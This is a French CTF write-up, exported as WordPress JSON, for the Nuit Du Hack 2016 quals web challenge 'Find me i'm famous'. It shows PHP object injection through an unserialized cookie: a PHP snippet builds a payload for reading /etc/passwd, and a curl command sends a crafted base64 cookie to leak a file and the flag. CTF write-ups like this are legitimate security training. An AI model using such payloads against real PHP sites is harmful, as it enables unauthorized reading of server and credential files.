{"id":2327,"date":"2016-04-04T00:52:26","date_gmt":"2016-04-03T22:52:26","guid":{"rendered":"https:\/\/0x90r00t.com\/fr\/?p=2327"},"modified":"2016-04-12T02:21:46","modified_gmt":"2016-04-12T00:21:46","slug":"nuit-du-hack-quals-2016-web-100-find-me-im-famous-write-up","status":"publish","type":"post","link":"https:\/\/0x90r00t.com\/fr\/2016\/04\/04\/nuit-du-hack-quals-2016-web-100-find-me-im-famous-write-up\/","title":{"rendered":"[Nuit Du Hack Quals 2016] [Web 100 – Find me i’m famous] Write Up"},"content":{"rendered":"

Description<\/h2>\n

Hey Dude! This authentication annoys me, please help!<\/p>\n

The challenge is available at http:\/\/findmeimfamous.quals.nuitduhack.com<\/p><\/blockquote>\n

<\/p>\n

Resolution<\/h2>\n

Nous nous retrouvons devant un formulaire nous demandant de nous enregistrer, avec un nom et un \u00e2ge.<\/p>\n

\"signup\"<\/a><\/p>\n

Une fois cette \u00e9tape effectu\u00e9e, un cookie est enregistr\u00e9 contenant une chaine en base64 int\u00e9ressante. Une fois d\u00e9cod\u00e9e, cela nous donne un objet serializ\u00e9 en php.<\/p>\n

cook=Tzo0OiJVc2VyIjoyOntzOjM6ImFnZSI7czo1OiJhZG1pbiI7czo0OiJuYW1lIjtzOjU6ImFkbWluIjt9m<\/pre>\n
Une fois d\u00e9cod\u00e9 :<\/p>\n
O:4:"User":2:{s:3:"age";s:5:"admin";s:4:"name";s:5:"admin";}<\/pre>\n
Apr\u00e8s l’enregistrement, un formulaire nous demande notre nom, qui une fois post\u00e9 nous renvoie un joli message \u00ab\u00a0Hello NAME you have AGE years old.\u00a0\u00bb.<\/p>\n
\"second<\/a><\/p>\n
Le probl\u00e8me ici, c’est qu’on comprend bien que la faille doit venir de l’unserialize, mais … sur quelle classe ?<\/p>\n
Coup de bol, en cherchant de la documentation sur les failles unserialize, nous sommes tomb\u00e9s sur l’article http:\/\/securitycafe.ro\/2015\/01\/05\/understanding-php-object-injection\/.<\/p>\n
La classe FileClass \u00e9tant utilis\u00e9e dans l’\u00e9preuve, cela nous a permis de lire les fichiers que nous voulions sur le serveur.<\/p>\n
<?php\r\nclass FileClass {\r\n public $filename;\r\n}\r\n$f = new FileClass();\r\n$f->filename = '\/etc\/passwd';\r\necho serialize($f);\r\n<\/pre>\n
Avec ce code nous g\u00e9n\u00e9rant le payload pour lire n’importe quel fichier, facile, y’a plus qu’\u00e0 lire le \/etc\/passwd ou un fichier commun comme dans n’importe quel CTF ? Et bien non…<\/p>\n
Nous avons cherch\u00e9 partout sur le serveur, en r\u00e9cup\u00e9rant l’int\u00e9gralit\u00e9 des sources des pages inclues dans le site, \/etc\/passwd, \/flag, configuration apache, etc., rien \u00e0 faire… le flag reste introuvable.<\/p>\n
Apr\u00e8s des heures \u00e0 chercher une exploitation logique, c’est un coup de bol\u00b2 (…) qui nous a fait trouver le dossier \u00ab\u00a0git\u00a0\u00bb \u00e0 la racine de l’\u00e9preuve (pourquoi ne pas avoir mis le point devant le nom du dossier ?!).<\/p>\n
L\u00e0, d’un seul coup, tout s’\u00e9claire, un coup de wget pour r\u00e9cup\u00e9rer r\u00e9cursivement tout le d\u00e9pot, puis un check dans les logs de commit :<\/p>\n
\"git\"<\/a><\/p>\n
R\u00e9cup\u00e9rer le contenu du fichier nous donne (enfin) le flag :<\/p>\n
$ curl 'http:\/\/findmeimfamous.quals.nuitduhack.com\/result.php' -b "cook=$(echo 'O:9:"FileClass":1:{s:8:"filename";s:14:"ufhkistgfj.php";}' | base64 | tr -d "\\n")"<\/pre>\n
<?php\r\nif ($_COOKIE["cook"]==Tzo5OiJGaWxlQ2xhc3MiOjE6e3M6ODoiZmlsZW5hbWUiO3M6MTQ6InVmaGtpc3RnZmoucGhwIjt9){\r\n echo "NDH[bsnae6PcNyrWZ82Q8v6pfJ6C6HG433L6]";\r\n}\r\n<\/pre>\n
Le flag \u00e9tait : bsnae6PcNyrWZ82Q8v6pfJ6C6HG433L6<\/p>\n","protected":false},"excerpt":{"rendered":"
Description Hey Dude! This authentication annoys me, please help! The challenge is available at http:\/\/findmeimfamous.quals.nuitduhack.com<\/p>\n","protected":false},"author":9,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[156],"tags":[161,159,157,158,160,54],"class_list":["post-2327","post","type-post","status-publish","format-standard","hentry","category-nuit-du-hack-quals","tag-git","tag-guess","tag-ndh","tag-quals","tag-unserialize","tag-php"],"_links":{"self":[{"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/posts\/2327","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/users\/9"}],"replies":[{"embeddable":true,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/comments?post=2327"}],"version-history":[{"count":15,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/posts\/2327\/revisions"}],"predecessor-version":[{"id":2347,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/posts\/2327\/revisions\/2347"}],"wp:attachment":[{"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/media?parent=2327"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/categories?post=2327"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/tags?post=2327"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}